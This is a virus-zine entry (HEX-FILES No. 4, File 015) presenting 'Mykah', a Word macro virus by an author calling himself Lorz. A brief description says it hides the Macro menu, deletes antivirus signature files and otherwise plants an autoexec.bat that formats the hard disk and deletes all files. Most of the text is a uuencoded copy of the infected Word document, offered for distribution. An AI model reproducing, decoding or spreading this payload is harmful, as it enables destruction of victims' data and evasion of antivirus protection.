 
  HEX-FILES No. 4                                                   File 015
 ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ 
 
                                    Mykah
 
                             A Word Macro Virus
 
                                     by
 
                                    Lorz
 
                            lorz@hackerz.zzn.com
                      http://members.tripod.com/~Lorz/
 
 
 
 
    Mykah has the following characteristics:
    
 
       It is stealth. The stealth technique used was derived from 
       information I got from the NoMercyVirusTeam. It deletes Macro from 
       the Tools menu preventing early detection of the virus. However, 
       you could access Macro through ALT-F11.
  
       It has retro routine. It deletes data files of AVs on a certain 
       folder. The files deleted are viruscan.dat, fpwm32.dll, scan.dat 
       and tbscan.sig.
  
       However, if it could not find the AV files, it would rename the 
       autoexec.bat to autoexec.aav and create a new autoexec.bat. This 
       autoexec.bat would display messages, format the hard disk and 
       delete all files on the disk.
 
 ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
 ±*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*± 
 ±*WARNING*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*WARNING*± 
 ±*WARNING*±                                                     ±*WARNING*± 
 ±*WARNING*±           VIRUS CONTAINS DESTRUCTIVE CODES          ±*WARNING*± 
 ±*WARNING*±                                                     ±*WARNING*± 
 ±*WARNING*±            VIRUS DOES INTENTIONAL DAMAGE            ±*WARNING*± 
 ±*WARNING*±                                                     ±*WARNING*± 
 ±*WARNING*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*WARNING*± 
 ±*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*± 
 ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
 
 ÄÄ MYKAH.UUE STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 

begin 644 mykah.doc
MT,\1X*&Q&N$`````````````````````/@`#`/[_"0`&```````````````!
M````(0``````````$```(P````$```#^____`````"````#_____________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_______________________LI<$`1P`)!````!*_````````$```````!```
M)P0```X`8FIB:H[9CMD````````````````````````)!!8`'@P``.RS`0#L
MLP$`)P````````````````````````````````````````#__P\`````````
M``#__P\```````````#__P\``````````````````````%T``````)(`````
M````D@```)(`````````D@````````"2`````````)(`````````D@```!0`
M`````````````,(`````````P@````````#"`````````,(`````````P@``
M``P```#.````#````,(`````````'`,``+8```#F`````````.8`````````
MY@````````#F`````````.8`````````Y@````````#F`````````.8`````
M````5`$``(\!``#C`@```````.,"````````XP(```````#C`@```````.,"
M````````XP(``"0```#2`P``]`$``,8%``"V````!P,``!4`````````````
M````````````D@````````#F``````````````````````````````#F````
M`````.8`````````Y@````````#F``````````<#````````$@$```````"2
M`````````)(`````````Y@```````````````````.8`````````Y@``````
M```2`0```````!(!````````$@$```````#F````(@```)(`````````Y@``
M``````"2`````````.8`````````5`$`````````````````````````````
MI@````X```"T````#@```)(`````````D@````````"2`````````)(`````
M````Y@````````!4`0```````!(!``!"````$@$``````````````````%0!
M````````D@````````"2````````````````````````````````````````
M````````````````````````````````````````````5`$```````#F````
M`````-H````,````(-=KU\K9N@'"`````````,(`````````"`$```H```!4
M`0``````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````5&AI<R!I<R!4:&4@($UY:V%H($UA8W)O(%9I<G5S(&)Y($QO<GH-
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````!```#`0``"<$````_0``````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````````````1#2B@``@`$```G
M!```_0``````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````$````!``0``"<$````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````$<`!^PT"\@L.`](;`(!R*P
M"`<CD*`%))"@!26P````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````$@`/``H``0!;``\``@`````````D``!`\?\"
M`"0````&`$X`;P!R`&T`80!L`````@````0`;4@)!```````````````````
M`````#P`04#R_Z$`/````!8`1`!E`&8`80!U`&P`=``@`%``80!R`&$`9P!R
M`&$`<`!H`"``1@!O`&X`=```````````````````````)P````,```P`````
M_____P$````$(/__`0```````````"<`````````````!```)P0```,`````
M!```)P0```0`````!```)P0```4`````````#0```!(````B````)@```"D`
M```'`!P`!P`$``<``````"D````$`/__`@```!``(``@`"``(``@`"``(``@
M`"``+@`@`"``(``@`"``(``,`$$`.@!<`$T`>0!K`&$`:``N`&0`;P!C`/\!
M`P```%8``````/__`````````````````````%8``0`!`/__````````````
M`````````%8``@`"`/__`````````````````````!#__P,``@`:`%``<@!O
M`&H`90!C`'0`+@!-`&\`9`!U`&P`90`Q`"X`5`!O`&\`;`!S`$T`80!C`'(`
M;P`!`!@`4`!R`&\`:@!E`&,`=``N`$T`;P!D`'4`;`!E`#$`+@!!`'4`=`!O
M`$\`<`!E`&X``0`4`%``<@!O`&H`90!C`'0`+@!-`&\`9`!U`&P`90`Q`"X`
M4@!O`&P`>@`!`!$#``(`%`!0`%(`3P!*`$4`0P!4`"X`30!/`$0`50!,`$4`
M,0`N`%(`3P!,`%H````!`!@`4`!2`$\`2@!%`$,`5``N`$T`3P!$`%4`3`!%
M`#$`+@!!`%4`5`!/`$\`4`!%`$X``````!H`4`!2`$\`2@!%`$,`5``N`$T`
M3P!$`%4`3`!%`#$`+@!4`$\`3P!,`%,`30!!`$,`4@!/````0`.``0`F````
M)@```%";=0!2`5(!)@`````````E``````````(0`````````"<````P```(
M`$````,```!'%I`!```"`@8#!00%`@,$`P````````````````````$`````
M````5`!I`&T`90!S`"``3@!E`'<`(`!2`&\`;0!A`&X````U%I`!`@`%!0$"
M`0<&`@4'`````````!```````````````(``````4P!Y`&T`8@!O`&P````S
M)I`!```""P8$`@("`@($`P````````````````````$`````````00!R`&D`
M80!L````(@`$`'$(B!@``-`"``!H`0````"W'`%FP1P!9@`````!``4`````
M``````````$``0````0``Q`!```````````````!``$````!`````````-$"
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`*4&P`>T`+0`@`!R,```````````````````````````````````````````
M````````````````````````````````````````````````````````````
M```````"````GP'__Q(`````````)@!4`&@`:0!S`"``:0!S`"``5`!H`&4`
M(``@`$T`>0!K`&$`:``@`$T`80!C`'(`;P`@`%8`:0!R`'4`<P`@`&(`>0`@
M`$P`;P!R`'H`````````$``@`"``(``@`"``(``@`"``(``@`"``(``@`"``
M(``@`!``(``@`"``(``@`"``(``@`"``(``@`"``(``@`"``(```````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````/[_```$``(```````````````````````$`
M``#@A9_R^4]H$*N1"``K)[/9,````(P!```0`````0```(@````"````D```
M``,```#`````!````,P````%````Z`````<```#T````"`````0!```)````
M(`$``!(````L`0``"@```$@!```,````5`$```T```!@`0``#@```&P!```/
M````=`$``!````!\`0``$P```(0!```"````Y`0``!X````G````5&AI<R!I
M<R!4:&4@($UY:V%H($UA8W)O(%9I<G5S(&)Y($QO<GH`(!X````!`````&AI
M<QX````1````("`@("`@("`@("`@("`@(`!H($T>`````0````!O;6D>````
M!P```$YO<FUA;``@'@```!$````@("`@("`@("`@("`@("`@`&@@31X````"
M````,0!M:1X````3````36EC<F]S;V9T(%=O<F0@."XP`$U``````%[0L@``
M``!``````!I<[<G9N@%``````+[OP\K9N@$#`````0````,``````````P``
M```````#````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````#^_P``!``"```````````````````````"
M`````M7-U9PN&Q"3EP@`*RSYKD0````%U<W5G"X;$).7"``K+/FN;`$``"@!
M```,`````0```&@````/````<`````4```"4````!@```)P````1````I```
M`!<```"L````"P```+0````0````O````!,```#$````%@```,P````-````
MU`````P````'`0```@```.0$```>````&0```"`@("`@("`@("`@("`@("`@
M("`@("`@(```:``#`````0````,````!`````P`````````#````LPT(``L`
M````````"P`````````+``````````L`````````'A````$````G````5&AI
M<R!I<R!4:&4@($UY:V%H($UA8W)O(%9I<G5S(&)Y($QO<GH`#!````(````>
M````!@```%1I=&QE``,````!````````F`````,`````````(`````$````V
M`````@```#X````!`````@````H```!?4$E$7T=5240``@```.0$``!!````
M3@```'L`-@`R`#,`,P`S`#``00`Y`"T`-``V`#``,``M`#$`,0!#`$8`+0`Y
M`$,`-0`X`"T`,``P`#``,``P`#$`,P`U`#$`.0`U`#<`?0``````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````0````(````#````!`````4````&````
M!P```/[___\)````"@````L````,````#0````X````/````_O___Q$````2
M````$P```!0````5````%@```!<```#^____&0```!H````;````'````!T`
M```>````'P```/[____]____(@```"8```#^____)0```"D````[````*```
M`/[___\J````*P```"P````M````-P```"\````P````,0```#(````S````
M-````#4````V````)P```#@````Y````.@```#P```#^_____O__________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M__________________________________________________]2`&\`;P!T
M`"``10!N`'0`<@!Y`````````````````````````````````.$!`*#`C4@`
M-!!)`#A#2``40T@`%@`%`?__________`P````8)`@``````P````````$8`
M````````````````YP+8RMFZ`20```"`%@```````#$`5`!A`&(`;`!E````
M```.`````0````@`````````````````````````````````````````````
M`%$!`*`.``(`________________5`!H`&4`(``@`$T`>0!K`&$`:``@`$T`
M80!C`'(`;P`@`%8`"``````0```@`&(`5P!O`'(`9`!$`&\`8P!U`&T`90!N
M`'0``````````````````````````````````````````````````````!H`
M`@$%````__________\`````````````````````````````````````````
M`````````````!`````````%`%,`=0!M`&T`80!R`'D`20!N`&8`;P!R`&T`
M80!T`&D`;P!N````````````````````````````````````*``"`0(````$
M````_____U0`:`!E`"``(`!-`'D`:P!A`&@`(`!-`&$`8P!R`&\`(`!6`!``
M````$```(`!B``4`1`!O`&,`=0!M`&4`;@!T`%,`=0!M`&T`80!R`'D`20!N
M`&8`;P!R`&T`80!T`&D`;P!N````ZCII$*+8"``X``(!________________
M```````````````Y)$9(`#8``/`4`!\`X$_0(.HZ:1"BV`@`&``````0```Z
M7```30!A`&,`<@!O`',`````D21&2``V``#P%``?`.!/T"#J.FD0HM@(`"LP
M,)T9`"5$.EP```````````````````X``0$!````#0````P`````````````
M`````````````````("_-]+*V;H!(-=KU\K9N@$````Y=@``;&P```!6`$(`
M00```#P220!D#4D`_$9(`"8``/!0H`-(=`])`!4````5`````0````!'2```
M`````````'T"`*`\$DD`"``!`/__________!P``````````````````````
M````````H&`_TLK9N@'`.7G6RMFZ`3P`0`!D1T@`)@``\%0`:`!I`',`1`!O
M`&,`=0!M`&4`;@!T````````````%0(`H#P220`\`$``F$=(`"8``/!0H`-(
M>$=(`!(````:``(!"`````D```#_____`````.$!`*`\`$``-!!)`,Q'2```
M`````````````````````````(<#``#01T@``0````(````#````!`````4`
M```&````!P````@````)````"@````L````,````#0````X```#^____$```
M`!$````2````$P```!0````5````%@```!<````8````&0```!H````;````
M'````!T````>````'P```"`````A````(@```",````D````)0```"8````G
M````*````"D````J````*P```"P````M````+@```"\````P````,0```#(`
M```S````-````#4````V````-P```#@````Y````.@```#L````\````/0``
M`#X````_````0````$$```!"````0P```/[___]%````1@```$<```!(````
M20```$H```!+````3````$T```!.````_O___U````#^____4@```%,```!4
M````50```%8```!7````_O___UD```#^____________________________
M____________________________________________________________
M____________________________________________________________
M__________________________________________________________\!
M%@$``+8`__\!`0````#_____`````/_______P``````````````````````
M```````````````````````````````````````````````0`````P````4`
M```'````__________\!`0@```#_____>````-X```")`@``SP$``/____\`
M`````0```-@_VC\``/__HP```(@````(````````````````````````````
M``````````````#__P``I0(``-8```#6````^0(`````_____P````#?`/__
M``````P`____________________________________________________
M____________________________________________________________
M__________________________________________________________\H
M`````@!3(O____\```$`4Q#_____```!`%,B_____P`````"//____\``/__
M`0$``````0`H`#$`3@!O`'(`;0!A`&P`+@!4`&@`:0!S`$0`;P!C`'4`;0!E
M`&X`=`````````#?`````/____\!`3@````"@?[___________\H``````#_
M_P``````````__________\`````'0```"0```#_____2```````__\```$`
M````````________________`````/____________________\`````____
M_________________P``````````__________\`````________________
M________________________344``/_______P````#__P````#__P$!````
M````````````````````````````````````````````````````````````
M`````````````````````/[*`0```/____\!`0@```#_____>`````&*L`!!
M='1R:6)U=`!E(%9"7TYA;0!E(#T@(E1H:0!S1&]C=6UE;A!T(@T*"HQ"87,!
M`HPQ3F]R;6%L`BX95D-R96%T801B;`%@1F%L<V4!#)90<F5D96-L$F$`!DED
M`'A4<G6!#2)%>'!O<V44'`!496UP;&%T92!$97)I=A4D0W7`<W1O;6EZ!(<#
M8P``````````````````````````````````````````````````````````
M``````````````````#,85X```$`_PD$```)!```Y`0!`````````````0`&
M``(`%@$J`%P`1P![`#``,``P`#(`,``T`$4`1@`M`#``30!O`&0`=0!L`&4`
M,0``````````````````````````````````````````````````````````
M`````````!```@$*````__________\`````````````````````````````
M```````````````````N````;!4```````!?`%8`0@!!`%\`4`!2`$\`2@!%
M`$,`5```````````````````````````````````````````````````````
M&@`"`?_______________P``````````````````````````````````````
M``````````\````4#0```````&0`:0!R````````````````````````````
M```````````````````````````````````````````````````(``(`____
M____________````````````````````````````````````````````````
M1````*X"````````4`!2`$\`2@!%`$,`5`!W`&T`````````````````````
M`````````````````````````````````````````!0``@#_____________
M__\```````````````````````````````````````````````!/````00``
M```````P#0IM)(`#1FD$;&6!LB0H*2`K@"`B.E)O;'H`LP&"FD-O<'D@;21H
M+"`B@Q\Z`18!*$'^<P`1$A\%0Q8AA"^*78$)`8%;#0I/;B!%<@!R;W(@1V]4
M;R0@84%K5D:!*2)#!#I<P"YG<F%M(`%!(7-<3F]R=&\`;B!!;G1I5FD0<G5S
M7$`!<V-AX&XN1&%T0!^(>9H"28`826:#%"0HP!HI`<!$(B(@5&AE;E$'(5-E
M=(&E(,`'+((@0$X@2VEL;$$#PP$HBQ<-"F$Z0`4+,C)CP0E!0@4R`4EE>/!E
M8RYB@RH'(,`(#B"_`0\%(,`'`B!!&`![(,`#)"!&@$M!<$`#9"`@07,@(S'!
M&E!R&&EN=,`"@&Y`96/`:&\@;V9F`D4(!@!)1B!E>&ES=)P@(@!^0#:!?R!T
MP3WX9&5L!04!$]I/!@=!"F!#;&]S980@90T-]`IC#TQDH0EA$F!_+C\$1BT@
M070Y-5Q&`'!W;3,R+F1LOFQA&]LX(0K?.*@99*$2;P(L8Q"?-JE&9@`8C38@
M\^%S7S8@(C\S0",A).<MX`T*#0IF(!:@`DM/!F?A!#4I36-!9F7H95Q3P69D
M;5&`!FY1-Z$)ORBH*&>_*,)Y)"C[0%G.#6B`%[\HP*`17[\HUR`<H2.I*&AQ
M*&FA!(`%@T&#H%%48F%V=\!/Q%1BXHUS:6??3T$(VQ\G""=I'R<8)TH@%A\G
MW1\G*X&<%H/+3TH@%F!P`$1A>2A.;W<HBBFA.3C@LV0@38#Q9FB#`D`H-RFB
MJV$J(`8@A13ANT%55$]%`%A%0RY"050B/W-6`!$B@.X!H4Y*`4%!/E91&``#
M4C8/`V%23W60='!U=&=2("")4N9%B5*J`6-L`6^P!?D"87)5("!,;P!V(%A2
M0&]T(%II;@!598YRE`C(!<("270GH(`)D&-I;H%6(&9A;1AI;'G/`I,%4%97
M`"!R97-T:6YGX7``8F5L;/!\SP*3!8`G;2!L;V]KL0*"9L`(37EK86B_`@>#
M!7$,-P`M+4%+4$PM+<\"P@)Y?.`$;0!A="!C.B`O=1`@+W8Z@!8@/FX>=2)7
M4`0X#F!C=')E\&4@+WG1`C@"=R)A!PAD<VN!<$QE9G0`)"A$969A=6P`=$1I
M<B0H.2D8+"`S`)U!`D1O8QY-P!31EZ%-YH(`````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````,``P`#``
M+0`P`#``,``P`"T`0P`P`#``,``M`#``,``P`#``,``P`#``,``P`#``-``V
M`'T`(P`S`"X`,``C`#D`(P!#`#H`7`!0`%(`3P!'`%(`00!-`"``1@!)`$P`
M10!3`%P`0P!/`$T`30!/`$X`(`!&`$D`3`!%`%,`7`!-`$D`0P!2`$\`4P!/
M`$8`5``@`%,`2`!!`%(`10!$`%P`5@!"`$$`7`!6`$(`00`S`#,`,@`N`$0`
M3`!,`",`5@!I`',`=0!A`&P`(`!"`&$`<P!I`&,`(`!&`&\`<@`@`$$`<`!P
M`&P`:0!C`&$`=`!I`&\`;@!S`````````````````!`!*@!<`$<`>P`P`#``
M,``R`#``.0`P`#4`+0`P`#``,``P`"T`,``P`#``,``M`$,`,``P`#``+0`P
M`#``,``P`#``,``P`#``,``P`#0`-@!]`",`.``N`#``(P`T`#``.0`C`$,`
M.@!<`%``<@!O`&<`<@!A`&T`(`!&`&D`;`!E`',`7`!-`&D`8P!R`&\`<P!O
M`&8`=``@`$\`9@!F`&D`8P!E`%P`3P!F`&8`:0!C`&4`7`!-`%,`5P!/`%(`
M1``X`"X`3P!,`$(`(P!-`&D`8P!R`&\`<P!O`&8`=``@`%<`;P!R`&0`(``X
M`"X`,``@`$\`8@!J`&4`8P!T`"``3`!I`&(`<@!A`'(`>0``````````````
M``"X`"H`7`!'`'L`,``P`#``,@`P`#0`,P`P`"T`,``P`#``,``M`#``,``P
M`#``+0!#`#``,``P`"T`,``P`#``,``P`#``,``P`#``,``T`#8`?0`C`#(`
M+@`P`",`,``C`$,`.@!<`%<`20!.`$0`3P!7`%,`7`!3`%D`4P!4`$4`30!<
M`%,`=`!D`$\`;`!E`#(`+@!T`&P`8@`C`$\`3`!%`"``00!U`'0`;P!M`&$`
M=`!I`&\`;@````````````````#@`"H`7`!'`'L`,P`V`#8`1`!#`#0`,@`R
M`"T`-P`Y`#(`,0`M`#$`,0!$`#$`+0`Y`$,`-0`S`"T`,``P`#``,``P`#$`
M,P`U`#$`.0`U`#<`?0`C`#(`+@`P`",`,``C`$,`.@!<`%<`20!.`$0`3P!7
M`%,`7`!3`%D`4P!4`$4`30!<`$T`4P!&`&\`<@!M`',`+@!4`%<`1``C`$T`
M:0!C`'(`;P!S`&\`9@!T`"``1@!O`'(`;0!S`"``,@`N`#``(`!/`&(`:@!E
M`&,`=``@`$P`:0!B`'(`80!R`'D```````````````$`Y``J`%P`1P![`#,`
M-@`V`$0`0P`T`#(`,P`M`#<`.0`R`#$`+0`Q`#$`1``Q`"T`.0!#`#4`,P`M
M`#``,``P`#``,``Q`#,`-0`Q`#D`-0`W`'T`(P`R`"X`,``C`#``(P!#`#H`
M7`!7`$D`3@!$`$\`5P!3`%P`5`!%`$T`4`!<`%8`0@!%`%P`30!3`$8`;P!R
M`&T`<P`N`$4`6`!$`",`30!I`&,`<@!O`',`;P!F`'0`(`!&`&\`<@!M`',`
M(``R`"X`,``@`$\`8@!J`&4`8P!T`"``3`!I`&(`<@!A`'(`>0``````````
M`````0```.$N10V/X!H0A2X"8(Q-"[0``!(`*@!<`$,`3@!O`'(`;0!A`&P`
M$@`J`%P`0P!.`&\`<@!M`&$`;``K&^<P!``````````,`2H`7`!'`'L`,@!$
M`$8`.`!$`#``-`!#`"T`-0!"`$8`00`M`#$`,``Q`$(`+0!"`$0`10`U`"T`
M,``P`$$`00`P`#``-``T`$0`10`U`#(`?0`C`#(`+@`P`",`,``C`$,`.@!<
M`%``4@!/`$<`4@!!`$T`(`!&`$D`3`!%`%,`7`!-`$D`0P!2`$\`4P!/`$8`
M5``@`$\`1@!&`$D`0P!%`%P`3P!&`$8`20!#`$4`7`!-`%,`3P`Y`#<`+@!$
M`$P`3``C`$T`:0!C`'(`;P!S`&\`9@!T`"``3P!F`&8`:0!C`&4`(``X`"X`
M,``@`$\`8@!J`&4`8P!T`"``3`!I`&(`<@!A`'(`>0`````````````````"
M``(``0`#``0"```&`@$`"`(``!@"________`````/__``!?8>HP!@#_____
M_____P``_____________________P$`____________________________
M____________________`0````````````````````````#8/P(`&`!4`&@`
